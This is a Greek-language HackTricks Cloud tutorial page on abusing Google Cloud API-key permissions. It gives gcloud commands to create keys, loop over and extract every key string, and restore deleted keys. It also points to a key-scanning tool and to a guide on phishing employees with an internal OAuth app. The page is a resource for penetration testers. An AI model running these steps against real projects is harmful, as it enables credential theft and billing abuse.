GCP - Apikeys Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Apikeys

Οι παρακάτω άδειες είναι χρήσιμες για τη δημιουργία και την κλοπή API keys, όχι αυτό από τα έγγραφα: Ένα API key είναι μια απλή κρυπτογραφημένη συμβολοσειρά που ταυτοποιεί μια εφαρμογή χωρίς κανένα κύριο. Είναι χρήσιμα για την πρόσβαση σε δημόσια δεδομένα ανώνυμα, και χρησιμοποιούνται για να συσχετίσουν τα API αιτήματα με το έργο σας για ποσοστά και χρέωση.

Επομένως, με ένα API key μπορείτε να κάνετε αυτή την εταιρεία να πληρώσει για τη χρήση του API, αλλά δεν θα μπορείτε να αναβαθμίσετε τα δικαιώματα.

Για περισσότερες πληροφορίες σχετικά με τα API Keys ελέγξτε:

GCP - API Keys Enum

Για άλλους τρόπους δημιουργίας API keys ελέγξτε:

GCP - Serviceusage Privesc

Brute Force API Key access

Καθώς μπορεί να μην γνωρίζετε ποιες APIs είναι ενεργοποιημένες στο έργο ή τους περιορισμούς που εφαρμόζονται στο API key που βρήκατε, θα ήταν ενδιαφέρον να εκτελέσετε το εργαλείο https://github.com/ozguralp/gmapsapiscanner και να ελέγξετε τι μπορείτε να αποκτήσετε πρόσβαση με το API key.

`apikeys.keys.create`

Αυτή η άδεια επιτρέπει να δημιουργήσετε ένα API key:

gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}

Μπορείτε να βρείτε ένα σενάριο για την αυτοματοποίηση της δημιουργίας, εκμετάλλευσης και καθαρισμού ενός ευάλωτου περιβάλλοντος εδώ.

Σημειώστε ότι από προεπιλογή οι χρήστες έχουν δικαιώματα να δημιουργούν νέα έργα και τους χορηγείται ο ρόλος του Ιδιοκτήτη στο νέο έργο. Έτσι, ένας χρήστης θα μπορούσε να δημιουργήσει ένα έργο και ένα API key μέσα σε αυτό το έργο.

`apikeys.keys.getKeyString` , `apikeys.keys.list`

Αυτά τα δικαιώματα επιτρέπουν την καταγραφή και την απόκτηση όλων των apiKeys και την απόκτηση του Κλειδιού:

for  key  in  $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done

`apikeys.keys.undelete` , `apikeys.keys.list`

Αυτές οι άδειες σας επιτρέπουν να καταγράφετε και να αναγεννάτε διαγραμμένα api keys. Το API key παρέχεται στην έξοδο μετά την ολοκλήρωση της αναίρεσης διαγραφής:

gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>

Δημιουργία Εσωτερικής Εφαρμογής OAuth για phishing άλλων εργαζομένων

Ελέγξτε την παρακάτω σελίδα για να μάθετε πώς να το κάνετε αυτό, αν και αυτή η ενέργεια ανήκει στην υπηρεσία clientauthconfig σύμφωνα με τα έγγραφα:

GWS - Google Platforms Phishing

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousGCP - Privilege Escalation NextGCP - AppEngine Privesc

Last updated 3 days ago

Apikeys

Brute Force API Key access

apikeys.keys.create

apikeys.keys.getKeyString , apikeys.keys.list

apikeys.keys.undelete , apikeys.keys.list

Δημιουργία Εσωτερικής Εφαρμογής OAuth για phishing άλλων εργαζομένων

Apikeys

Brute Force API Key access

apikeys.keys.create

apikeys.keys.getKeyString , apikeys.keys.list

apikeys.keys.undelete , apikeys.keys.list

Δημιουργία Εσωτερικής Εφαρμογής OAuth για phishing άλλων εργαζομένων

`apikeys.keys.create`

`apikeys.keys.getKeyString` , `apikeys.keys.list`

`apikeys.keys.undelete` , `apikeys.keys.list`

`apikeys.keys.create`

`apikeys.keys.getKeyString` , `apikeys.keys.list`

`apikeys.keys.undelete` , `apikeys.keys.list`